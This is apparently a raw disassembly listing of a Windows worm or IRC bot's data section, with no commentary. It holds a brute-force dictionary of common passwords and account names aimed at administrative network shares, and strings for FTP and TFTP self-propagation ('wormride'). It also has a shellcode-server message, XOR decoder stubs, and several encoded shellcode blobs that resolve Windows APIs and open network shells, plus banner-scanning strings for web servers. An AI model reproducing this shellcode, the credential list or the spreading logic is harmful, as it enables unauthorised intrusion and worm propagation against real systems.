aWinpass db 'winpass',0 ; DATA XREF: .data:00415A50�o
aBlank db 'blank',0 ; DATA XREF: .data:00415A4C�o
align 4
aXp_0 db 'xp',0 ; DATA XREF: .data:00415A40�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:00415A3C�o
align 4
aHp db 'hp',0 ; DATA XREF: .data:00415A38�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: .data:00415A1C�o
align 4
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:00415A18�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:00415A0C�o
align 10h
aDb2 db 'db2',0 ; DATA XREF: .data:00415A08�o
aDb1 db 'db1',0 ; DATA XREF: .data:00415A04�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:00415A00�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:004159F8�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:004159F4�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:004159F0�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:004159E4�o
align 10h
aDomainpass db 'domainpass',0 ; DATA XREF: .data:004159E0�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:004159D8�o
align 4
aHell db 'hell',0 ; DATA XREF: .data:004159D4�o
align 4
aLove db 'love',0 ; DATA XREF: .data:004159D0�o
align 4
aMoney db 'money',0 ; DATA XREF: .data:004159CC�o
align 4
aSlut db 'slut',0 ; DATA XREF: .data:004159C0�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:004159BC�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:004159B8�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:004159B4�o
align 10h
aLoginpass db 'loginpass',0 ; DATA XREF: .data:004159A8�o
align 4
aLogin db 'login',0 ; DATA XREF: .data:004159A4�o
align 4
aQwe db 'qwe',0 ; DATA XREF: .data:00415940�o
aZxc db 'zxc',0 ; DATA XREF: .data:0041593C�o
aAsd db 'asd',0 ; DATA XREF: .data:00415938�o
aQaz db 'qaz',0 ; DATA XREF: .data:00415934�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:00415930�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0041592C�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:00415928�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:00415924�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .data:00415920�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0041591C�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:00415914�o
align 10h
aOem db 'oem',0 ; DATA XREF: .data:0041590C�o
aAccounting db 'accounting',0 ; DATA XREF: .data:004158FC�o
align 10h
aAccounts db 'accounts',0 ; DATA XREF: .data:004158F8�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: .data:004158F4�o
aSex db 'sex',0 ; DATA XREF: .data:004158F0�o
; .data:004159C4�o
aOutlook db 'outlook',0 ; DATA XREF: .data:004158E0�o
aMail db 'mail',0 ; DATA XREF: .data:004158DC�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:004158D8�o
align 10h
aTemp123 db 'temp123',0 ; DATA XREF: .data:004158D4�o
aTemp db 'temp',0 ; DATA XREF: .data:004158D0�o
align 10h
aNull db 'null',0 ; DATA XREF: .data:004158CC�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:004158BC�o
aChangeme db 'changeme',0 ; DATA XREF: .data:004158B8�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:004158A8�o
align 4
aTest db 'test',0 ; DATA XREF: .data:0041589C�o
align 4
a2005 db '2005',0 ; DATA XREF: .data:00415898�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:00415894�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:00415888�o
align 4
aSecret db 'secret',0 ; DATA XREF: .data:00415880�o
align 4
aPayday db 'payday',0 ; DATA XREF: .data:0041587C�o
align 4
aDeadline db 'deadline',0 ; DATA XREF: .data:00415878�o
align 10h
aWork db 'work',0 ; DATA XREF: .data:00415874�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:00415870�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:0041586C�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: .data:00415868�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:00415864�o
a123456 db '123456',0 ; DATA XREF: .data:00415860�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0041585C�o
align 4
a1234 db '1234',0 ; DATA XREF: .data:00415858�o
align 4
a123 db '123',0 ; DATA XREF: .data:00415854�o
a12 db '12',0 ; DATA XREF: .data:00415850�o
align 4
a1: ; DATA XREF: .data:0041584C�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:00415848�o
aPwd db 'pwd',0 ; DATA XREF: .data:00415844�o
aPass db 'pass',0 ; DATA XREF: .data:00415840�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0041583C�o
align 4
aDba db 'dba',0 ; DATA XREF: .data:00415838�o
aPasswd db 'passwd',0 ; DATA XREF: .data:00415834�o
align 10h
aPassword db 'password',0 ; DATA XREF: .data:00415830�o
; .data:004174E0�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .data:0041582C�o
align 4
aAbc db 'abc',0 ; DATA XREF: .data:00415828�o
aAb db 'ab',0 ; DATA XREF: .data:00415824�o
align 10h
aA_1: ; DATA XREF: .data:00415820�o
unicode 0, <a>,0
aIpc db 'IPC$',0 ; DATA XREF: .data:004157F8�o
align 4
aPrint db 'print$',0 ; DATA XREF: .data:004157F4�o
align 4
aCDocumentsAndS db 'C$\Documents and Settings\All Users\Documents\$',0
; DATA XREF: .data:004157F0�o
aAdmin_0 db 'admin$',0 ; DATA XREF: .data:004157EC�o
align 4
aAdminSystem32 db 'Admin$\system32',0 ; DATA XREF: .data:004157E8�o
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: .data:004157E4�o
aCWinntSystem32 db 'c$\winnt\system32',0 ; DATA XREF: .data:004157E0�o
align 4
aCWindows db 'c$\windows',0 ; DATA XREF: .data:004157DC�o
align 10h
aCWinnt db 'c$\winnt',0 ; DATA XREF: .data:004157D8�o
align 4
aEShared db 'e$\shared',0 ; DATA XREF: .data:004157D4�o
align 4
aDShared db 'd$\shared',0 ; DATA XREF: .data:004157D0�o
align 4
aCShared db 'c$\shared',0 ; DATA XREF: .data:004157CC�o
align 10h
aE_0 db 'e$',0 ; DATA XREF: .data:004157C8�o
align 4
aD db 'd$',0 ; DATA XREF: .data:004157C4�o
align 4
aC_1 db 'c$',0 ; DATA XREF: .data:004157C0�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:004157B8�o
; .data:00415A70�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: .data:004157B4�o
; .data:00415A6C�o
aOwner db 'owner',0 ; DATA XREF: .data:004157B0�o
; .data:00415A68�o
align 4
aStudent db 'student',0 ; DATA XREF: .data:004157AC�o
; .data:00415A64�o
aIntranet db 'intranet',0 ; DATA XREF: .data:004157A8�o
; .data:00415A60�o
align 4
aLan_0 db 'lan',0 ; DATA XREF: .data:004157A0�o
; .data:00415A58�o
aMain db 'main',0 ; DATA XREF: seg000:004107AC�o
; seg000:004107E0�o ...
align 4
aOffice db 'office',0 ; DATA XREF: .data:00415798�o
; .data:00415A48�o
align 4
aControl db 'control',0 ; DATA XREF: .data:00415794�o
; .data:00415A44�o
aSiemens db 'siemens',0 ; DATA XREF: .data:00415790�o
; .data:00415A34�o
aCompaq db 'compaq',0 ; DATA XREF: .data:0041578C�o
; .data:00415A30�o
align 4
aDell db 'dell',0 ; DATA XREF: .data:00415788�o
; .data:00415A2C�o
align 4
aCisco db 'cisco',0 ; DATA XREF: .data:00415784�o
; .data:00415A28�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:00415780�o
; .data:00415A24�o
aOracle db 'oracle',0 ; DATA XREF: .data:0041577C�o
; .data:00415A20�o
align 10h
aSql db 'sql',0 ; DATA XREF: .data:00415778�o
; .data:00415A14�o
aSa db 'sa',0 ; DATA XREF: .data:00415774�o
; .data:00415A10�o
align 4
aData db 'data',0 ; DATA XREF: .data:00415770�o
; .data:004159FC�o
align 10h
aAccess db 'access',0 ; DATA XREF: .data:0041576C�o
; .data:004159EC�o
align 4
aDatabase db 'database',0 ; DATA XREF: .data:00415768�o
; .data:004159E8�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:00415764�o
; .data:004159DC�o
align 4
aGod db 'god',0 ; DATA XREF: .data:00415760�o
; .data:004159C8�o
aBackup db 'backup',0 ; DATA XREF: .data:0041575C�o
; .data:004159B0�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:00415758�o
; .data:004159AC�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:00415754�o
; .data:004159A0�o
align 4
aKatie db 'katie',0 ; DATA XREF: .data:00415750�o
; .data:0041599C�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:00415748�o
; .data:00415994�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:00415744�o
; .data:00415990�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:00415740�o
; .data:0041598C�o
align 4
aNone db 'none',0 ; DATA XREF: .data:0041573C�o
; .data:004158A4�o
align 4
aGuest db 'guest',0 ; DATA XREF: .data:00415738�o
; .data:004158A0�o
align 4
aChris db 'chris',0 ; DATA XREF: .data:00415734�o
; .data:00415988�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:00415730�o
; .data:00415984�o
aNeil db 'neil',0 ; DATA XREF: .data:0041572C�o
; .data:00415980�o
align 10h
aLee db 'lee',0 ; DATA XREF: .data:00415728�o
; .data:0041597C�o
aBrian db 'brian',0 ; DATA XREF: .data:00415724�o
; .data:00415978�o
align 4
aSusan db 'susan',0 ; DATA XREF: .data:0041571C�o
; .data:00415970�o
align 4
aSue db 'sue',0 ; DATA XREF: .data:00415718�o
; .data:0041596C�o
aSam db 'sam',0 ; DATA XREF: .data:00415714�o
; .data:00415968�o
aLuke db 'luke',0 ; DATA XREF: .data:00415710�o
; .data:00415964�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0041570C�o
; .data:00415720�o ...
align 4
aJohn db 'john',0 ; DATA XREF: .data:00415708�o
; .data:0041595C�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:00415704�o
; .data:00415958�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:00415700�o
; .data:00415954�o
align 4
aFred db 'fred',0 ; DATA XREF: .data:004156FC�o
; .data:00415950�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:004156F8�o
; .data:0041594C�o
aJen db 'jen',0 ; DATA XREF: .data:004156F4�o
; .data:00415948�o
aBob db 'bob',0 ; DATA XREF: .data:004156F0�o
; .data:0041574C�o ...
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:004156EC�o
; .data:00415918�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: .data:004156E8�o
; .data:00415910�o
aUser db 'user',0 ; DATA XREF: .data:004156E4�o
; .data:00415908�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:004156E0�o
; .data:00415904�o
align 10h
aHome db 'home',0 ; DATA XREF: .data:004156DC�o
; .data:00415900�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:004156D8�o
; .data:004157A4�o ...
align 4
aWww db 'www',0 ; DATA XREF: .data:004156D4�o
; .data:004158E8�o
aWeb db 'web',0 ; DATA XREF: .data:004156D0�o
; .data:004158E4�o
aRoot db 'root',0 ; DATA XREF: .data:004156CC�o
; .data:004158C8�o
align 4
aServer_0 db 'server',0 ; DATA XREF: .data:004156C8�o
; .data:004158C4�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:004156C0�o
; .data:004158B4�o
align 4
aUnix db 'unix',0 ; DATA XREF: .data:004156BC�o
; .data:004158B0�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:004156B8�o
; .data:004158AC�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:004156B4�o
; .data:0041581C�o
aAdmin db 'admin',0 ; DATA XREF: .data:004156B0�o
; .data:00415818�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:004156AC�o
; .data:00415814�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:004156A8�o
; .data:00415810�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:004156A4�o
; .data:0041580C�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:004156A0�o
; .data:00415808�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .data:0041569C�o
; .data:00415804�o
align 4
a231 db '231 -',0Dh,0Ah,0 ; DATA XREF: sub_40CA47:loc_40CF00�o
a221 db '221 -',0Dh,0Ah,0 ; DATA XREF: sub_40CA47+48A�o
dword_416008 dd 0C5020h ; DATA XREF: sub_40CA47:loc_40CEC9�r
dd 2 dup(0)
unk_416014 db 2Dh ; - ; DATA XREF: sub_40CA47+463�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TransferToSC db '- %u. Transfer to %s complete.',0
aFtp_0 db 'ftp',0 ; DATA XREF: sub_40CA47+45E�o
dword_416040 dd 148020h ; DATA XREF: sub_40CA47:loc_40CE0E�r
dd 2 dup(0)
dword_41604C dd 20363232h, 0A0D2Dh ; DATA XREF: sub_40CA47+386�o
; sub_40CA47+41A�o
aX32000Fh1024Ja db '-x 3 2000 fh 1024 Jan 1 0:00 .',0Dh,0Ah ; DATA XREF: sub_40CA47+353�o
db 'drwxr-xr-x 3 2000 fh 1024 Jan 1 0:00 ..',0Dh,0Ah
db '-rwxr-xr-x 3 2000 fh %u Jan 1 0:00 %s',0Dh,0Ah,0
align 4
a150 db '150 -',0Dh,0Ah,0 ; DATA XREF: sub_40CA47+2AA�o
; sub_40CA47+3D3�o
dword_4160D0 dd 10FCA0h ; DATA XREF: sub_40CA47:loc_40CCE5�r
dd 2 dup(0)
dword_4160DC dd 20333132h, 0A0D7525h, 0 ; DATA XREF: sub_40CA47+270�o
dword_4160E8 dd 142FA0h ; DATA XREF: sub_40CA47:loc_40CC65�r
dd 2 dup(0)
dword_4160F4 dd 20303032h, 0A0D2Dh ; DATA XREF: sub_40CA47:loc_40CC5B�o
dword_4160FC dd 7525h ; DATA XREF: sub_40CA47+201�o
aUUUUUU db '%u,%u,%u,%u,%u,%u',0 ; DATA XREF: sub_40CA47+1BB�o
align 4
dword_416114 dd 104EE0h ; DATA XREF: sub_40CA47:loc_40CBE2�r
align 10h
dword_416120 dd 20353234h, 0A0D2Dh ; DATA XREF: sub_40CA47+191�o
dword_416128 dd 10B928h ; DATA XREF: sub_40CA47+189�r
dd 2 dup(0)
dword_416134 dd 0A47A0h ; DATA XREF: sub_40CA47:loc_40CBC4�r
align 10h
dword_416140 dd 20373532h, 20222F22h, 0A0D2Dh ; DATA XREF: sub_40CA47+173�o
dword_41614C dd 213E0h ; DATA XREF: sub_40CA47:loc_40CBB2�r
dd 0
dword_416154 dd 20313132h, 0A0D2Dh ; DATA XREF: sub_40CA47+161�o
dword_41615C dd 120F20h ; DATA XREF: sub_40CA47:loc_40CBA0�r
dd 2 dup(0)
dword_416168 dd 20353132h, 0A0D2Dh ; DATA XREF: sub_40CA47+14F�o
dword_416170 dd 143CA0h ; DATA XREF: sub_40CA47+147�r
dd 2 dup(0)
dword_41617C dd 20303332h, 0A0D2Dh ; DATA XREF: sub_40CA47+129�o
dword_416184 dd 10B998h ; DATA XREF: sub_40CA47:loc_40CB61�r
align 10h
dword_416190 dd 20313333h, 0A0D2Dh ; DATA XREF: sub_40CA47+110�o
dword_416198 dd 144220h ; DATA XREF: sub_40CA47+101�r
dd 2 dup(0)
dword_4161A4 dd 0A0D20h ; DATA XREF: sub_40CA47+AC�o
dword_4161A8 dd 20303232h, 0A0D2Dh ; DATA XREF: sub_40CA47+11�o
dword_4161B0 dd 303332h ; DATA XREF: sub_40CF3E+143�o
dword_4161B4 dd 53534150h, 0A0D3120h, 0 ; DATA XREF: sub_40CF3E+F0�o
dword_4161C0 dd 313333h ; DATA XREF: sub_40CF3E+D1�o
dword_4161C4 dd 52455355h, 0A0D3120h, 0 ; DATA XREF: sub_40CF3E+76�o
dword_4161D0 dd 303232h ; DATA XREF: sub_40CF3E+59�o
unk_4161D4 db 2Dh ; - ; DATA XREF: sub_40D09D+A4�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningFtpWorm db '- Running FTP wormride thread',0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_40D09D+44�o
align 4
aFtpWormrideThr db 'FTP wormride thread',0 ; DATA XREF: sub_40D1B3+34�o
dword_41621C dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_40D201+369�o
unk_416228 db 2Dh ; - ; DATA XREF: sub_40D201+34B�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TftpTransfer db '- %u. tftp transfer to %s complete.',0
align 4
aWormride db 'wormride',0 ; DATA XREF: sub_40D201+346�o
align 4
dword_416264 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_40D201+1FE�o
aOctet db 'octet',0 ; DATA XREF: sub_40D201+1CE�o
align 10h
unk_416280 db 2Dh ; - ; DATA XREF: sub_40D201+E5�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningTftpWor db '- Running TFTP wormride thread',0
aTftpWormrideTh db 'TFTP wormride thread',0 ; DATA XREF: sub_40D5AA+2B�o
align 10h
loc_4162C0: ; DATA XREF: sub_40D700+3E�o
jmp short loc_4162D7
; ---------------------------------------------------------------------------
loc_4162C2: ; CODE XREF: .data:loc_4162D7�p
mov ecx, 0
xor ecx, 0
pop esi
loc_4162CE: ; CODE XREF: .data:004162D3�j
xor byte ptr [ecx+esi-1], 0
loop loc_4162CE
jmp short near ptr dword_4162DC
; ---------------------------------------------------------------------------
loc_4162D7: ; CODE XREF: .data:loc_4162C0�j
call loc_4162C2
; ---------------------------------------------------------------------------
dword_4162DC dd 0 ; CODE XREF: .data:004162D5�j
dword_4162E0 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_40D628+7E�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 6853h, 2680000h, 8B000000h, 6AD88BD4h, 0BA535210h, 5A603063h
dd 0B450D6FFh, 53555002h, 605800BAh, 0BFD6FFE2h, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_416394 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_40D628+4D�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 2685353h, 8B000000h, 6AD88BD4h, 0BA535210h, 0C2A69000h
dd 5040D6FFh, 3B7ABA53h, 0D6FFA173h, 0BA535050h, 69D310h
dd 0D88BD6FFh, 0B450C033h, 53555002h, 605800BAh, 0BFD6FFE2h
dd 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41645C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_40D628+1A�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 6AEC8B00h, 55544310h, 7232BA53h
dd 0D6FF1979h, 27D8166h, 0ED751111h, 22047D81h, 75222222h
dd 2B450E4h, 0BA535550h, 0E2605800h, 7D81D6FFh, 20EC8300h
dd 0BFEA758Bh, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 10h
dword_416510 dd 8B20EC83h, 45D89ECh, 81007D89h, 200ECh, 14658900h, 8B64DB33h
; DATA XREF: sub_40D7FD+5B�o
dd 408B3043h, 1C708B0Ch, 8788BADh, 0E8087D89h, 45h, 5F8B5653h
dd 3B5C8B3Ch, 53DF0378h, 3205B8Bh, 0C38353DFh, 3338B04h
dd 0ACC933F7h, 0C1C1C832h, 75C08405h, 75CA2BF6h, 0D82B58E9h
dd 35EEBD1h, 0DF03245Eh, 8B0B8B66h, 0DF031C5Eh, 38B048Bh
dd 0FF5B5EC7h, 33685EE0h, 68000032h, 5F327377h, 6E92BA54h
dd 0D6FF8404h, 8B0C4589h, 46A53F8h, 475FF55h, 669000BAh
dd 83D6FFE0h, 850F04F8h, 0C5h, 0E8087D8Bh, 0Dh, 3 dup(0)
dd 18458F00h, 6A026A53h, 68535301h, 0C0000000h, 0BA1875FFh
dd 5C6BD33Dh, 4589D6FFh, 840F401Ch, 8Dh, 330C7D8Bh, 2B450C0h
dd 1475FF50h, 0BA0475FFh, 0E2605800h, 7D8BD6FFh, 74C08508h
dd 41C88B1Eh, 8D535774h, 5051104Dh, 0FF1475FFh, 0B9BA1C75h
dd 0FFCBF5BEh, 74C085D6h, 0FFC5EB40h, 5CBA1C75h, 0FF9DC593h
dd 58446AD6h, 0FC8BE02Bh, 33ABD78Bh, 59106AC0h, 8BFDE2ABh
dd 5252087Dh, 50505050h, 0FF505050h, 2CBA1875h, 0FF2694F1h
dd 0C7FE58D6h, 1BA5053h, 0FFDE34D6h, 1C75FFD6h, 0C5935CBAh
dd 0FFD6FF9Dh, 3DBA1875h, 0FF27CF53h, 0C7D8BD6h, 0BA0475FFh
dd 7315685h, 7D8BD6FFh, 46BABA08h, 0D6FFC10Ch
db 0
byte_41668D db 0E3h ; DATA XREF: sub_40D700+AC�r
; sub_40D700+D8�w
align 10h
dword_416690 dd 4113E68Bh ; DATA XREF: sub_40D700+49�r
; sub_40D700+98�w
align 8
off_416698 dd offset dword_4166F0 ; DATA XREF: sub_40D88A+40�r
dd offset dword_4166E4
dd offset dword_4166D8
dd offset dword_4166C8
dd offset dword_4166BC
dd offset dword_4166D8
dd 3 dup(0)
dword_4166BC dd 8BD1FCAFh, 2 dup(0) ; DATA XREF: .data:004166A8�o
; .data:004177C8�o
dword_4166C8 dd 8A8FEAFAh, 0C88DD2CDh, 0DEh, 0 ; DATA XREF: .data:004166A4�o
; .data:004177C4�o
dword_4166D8 dd 0F5A78DC6h, 2 dup(0) ; DATA XREF: .data:004166A0�o
; .data:004166AC�o ...
dword_4166E4 dd 8AD0FDAEh, 2 dup(0) ; DATA XREF: .data:0041669C�o
; .data:off_4177BC�o
dword_4166F0 dd 0D088EAFAh, 8F8C90CDh, 9AE3C7h, 0 ; DATA XREF: .data:off_416698�o
; .data:off_4177B8�o
dword_416700 dd 72h ; DATA XREF: sub_40DA6E+F4�o
dword_416704 dd 62h ; DATA XREF: sub_40DB90+7F�o
dword_416708 dd 63h ; DATA XREF: sub_40DC48+3A�o
dword_41670C dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_40DCB8+66�o
dd 6C6C6568h, 65646F63h, 72657320h, 20726576h, 70206E6Fh
dd 2074726Fh, 2343003h, 2037325h, 0
dword_416744 dd 6C656853h, 646F636Ch, 65732065h, 72657672h, 206E6F20h
; DATA XREF: sub_40DD96+79�o
dd 74726F70h, 34300320h, 3752502h, 2
dword_416768 dd 0DF86A7F2h ; DATA XREF: sub_40D9B4+2D�r
; sub_40E18A+57�o ...
dd 3 dup(0)
dd 0A7000000h, 0DCF7h, 3 dup(0)
db 2 dup(0)
word_41678E dw 6BA4h ; DATA XREF: sub_40DE2B+2D�o
dd 92A5h
db 2 dup(0)
off_416796 dd offset sub_40B27D ; DATA XREF: sub_40D9B4+5�r
; sub_40D9B4+D�o ...
dw 3
dd 0
dd 0A7F20000h, 9ADF86h, 3 dup(0)
dd 0DCF7A700h, 4 dup(0)
dd 0CFD56AD8h, 0
dd offset sub_40B4D5
dd 3, 0
dd 0C188B7FAh, 0DBh, 2 dup(0)
dd 0A2000000h, 0DCF0h, 3 dup(0)
dd 1C900000h, 15E3h, 0BB6E0000h, 30040h, 0
dd 0AAE60000h, 99h, 3 dup(0)
dd 0DCF0A200h, 4 dup(0)
dd 0B4796D69h, 0
dd offset sub_40C0F9
dd 3, 0
dd 8099AAE6h, 3 dup(0)
dd 0A2000000h, 0DCF0h, 3 dup(0)
dd 9B9A0000h, 0EABDh, 0C1070000h, 30040h, 0
dd 0AFE10000h, 9Ah, 3 dup(0)
dd 0DCF7A700h, 4 dup(0)
dd 3D4FB2B6h, 0
dd offset sub_40C73D
dd 3, 0
dd 809AAFE1h, 3 dup(0)
dd 0A7000000h, 0DCF7h, 3 dup(0)
dd 4CE20000h, 5CB0h, 0C73D0000h, 30040h, 0
dd 0AFE10000h, 819Ah, 3 dup(0)
dd 0DCF0A200h, 4 dup(0)
dd 4B2A93EBh, 0
dd offset sub_40C73D
dd 3, 0
dd 869AAFE1h, 3 dup(0)
dd 0A2000000h, 0DCF0h, 3 dup(0)
dd 0EE470000h, 0B7B0h, 0C73D0000h, 30040h, 0
dd 0A5F20000h, 9DDFD784h, 0C49Dh, 2 dup(0)
dd 0DBF5A000h, 8Bh, 3 dup(0)
dd 0D674CFFCh, 0
dd offset sub_40AE3D
dd 1, 0
dd 0D784A5F2h, 0C49D9DDFh, 96h, 0
dd 0A0000000h, 8BDBF5h, 3 dup(0)
dd 0C3600000h, 0ADA1h, 0B11C0000h, 10040h, 0
dd 0B7FB0000h, 0C4C39Ah, 3 dup(0)
dd 0DAF0A700h, 81h, 3 dup(0)
dd 6013D920h, 0
dd offset sub_40BCAB
dd 1, 0
; ---------------------------------------------------------------------------
sti
mov bh, 9Ah
retn
; ---------------------------------------------------------------------------
dd 0D28E8CC4h, 0D7h, 0
dd 0A7000000h, 81DAF0h, 3 dup(0)
dd 0FCE70000h, 0B240h, 0BE070000h, 10040h, 0
dd 0ADF50000h, 0C7D19Ah, 3 dup(0)
dd 0F7A400h, 4 dup(0)
dd 0FAA3DD70h, 0
dd offset sub_40AC87
dd 11h dup(0)
dword_416AD0 dd 6E695728h, 293233h ; DATA XREF: sub_40DE7D+18D�o
dword_416AD8 dd 696E5528h, 2978h ; DATA XREF: sub_40DE7D+16F�o
dword_416AE0 dd 63617041h, 252F6568h, 75h ; DATA XREF: sub_40DE7D+162�o
aApache db 'Apache',0 ; DATA XREF: sub_40DE7D+149�o
align 4
aMicrosoftIisU_ db 'Microsoft-IIS/%u.%u',0 ; DATA XREF: sub_40DE7D+EA�o
aMicrosoftIis db 'Microsoft-IIS',0 ; DATA XREF: sub_40DE7D+CA�o
align 4
aServer db 'Server:',0 ; DATA XREF: sub_40DE7D+72�o
aOptionsHttp1_0 db 'OPTIONS / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40DE7D+E�o
db 0Dh,0Ah,0
align 4
unk_416B38 db 53h ; S ; DATA XREF: sub_40E18A+475�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 3
db 30h, 34h, 2
db 25h ; %
db 73h, 3, 2
db 3Ah ; :
db 25h, 73h, 20h
db 69h ; i
db 6Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 30h ; 0
db 2Eh, 32h, 66h
db 3
db 2, 73h, 65h
db 63h ; c
db 2Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aOpenIpSFound db 'open IP(s) found',0
align 4
dword_416B7C dd 2343003h, 2037325h, 2073253Ah, 6F207369h, 6E6570h
; DATA XREF: sub_40E18A+412�o
dword_416B90 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_40E18A+26A�o
dd 2343003h, 2037325h, 2073253Ah, 20726F66h, 2343003h
dd 2037525h, 63657320h, 28646E6Fh, 2973h
dword_416BC8 dd 6E616353h, 676E696Eh, 34300320h, 3732502h, 73253A02h
; DATA XREF: sub_40E18A+234�o
dd 726F6620h, 34300320h, 3752502h, 65732002h, 646E6F63h
dd 297328h
unk_416BF4 db 53h ; S ; DATA XREF: sub_40E629+186�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 69h, 6Eh, 67h
db 20h
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 3Ah, 25h, 73h
db 20h
db 66h, 6Fh, 72h
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aSecondSTUSU db ' second(s), t:%u s:%u',0
align 4
dword_416C2C dd 3430032Dh, 3752502h, 41202D02h, 6D657474h, 64657470h
; DATA XREF: sub_40E7C8+24A�o
